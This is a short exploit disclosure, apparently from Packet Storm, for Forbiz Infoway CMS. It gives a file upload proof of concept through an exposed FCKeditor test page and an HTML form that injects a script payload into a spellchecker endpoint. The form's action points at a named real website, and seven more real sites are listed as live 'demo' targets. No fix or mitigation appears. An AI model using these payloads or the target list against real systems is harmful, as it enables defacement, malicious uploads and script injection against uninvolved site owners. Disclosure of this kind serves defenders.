Forbiz Infoway CMS suffers from cross site scripting and remote file upload vulnerabilities.
cf554ff09a93feeb1179aa048a514acd285d1abb457cb045a6fdf98ae26c073f================================================================================
Forbiz Infoway CMS - File Upload / Cross Site Scripting
================================================================================
# Vendor Homepage: http://www.forbiz.co.in/
# Date: 07/10/2016
# Author: Ashiyane Digital Security Team
# Verion: All
================================================================================
# PoC of File Upload (FCKeditor):
Vulnerable page :
http://localhost/cms/editor/filemanager/connectors/uploadtest.html
Path of file : http://localhost/images/fck_editor_images/file.txt
# PoC of Xss :
<html>
<form
action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
method="post">
<input type="hidden"
name="textinputs[1</script><script>alert(123);//</script>]" value="test">
<input type="submit" value="xss">
</form>
# Demo :
http://www.chakraayurvedicresort.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.seshansacademy.com/cms/editor/filemanager/connectors/uploadtest.html
http://aiim.net.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.swiftport.net/cms/editor/filemanager/connectors/uploadtest.html
http://www.hrdcnainital.ac.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.svgmindia.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.attukalshoppingcomplex.com/cms/editor/filemanager/connectors/uploadtest.html
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed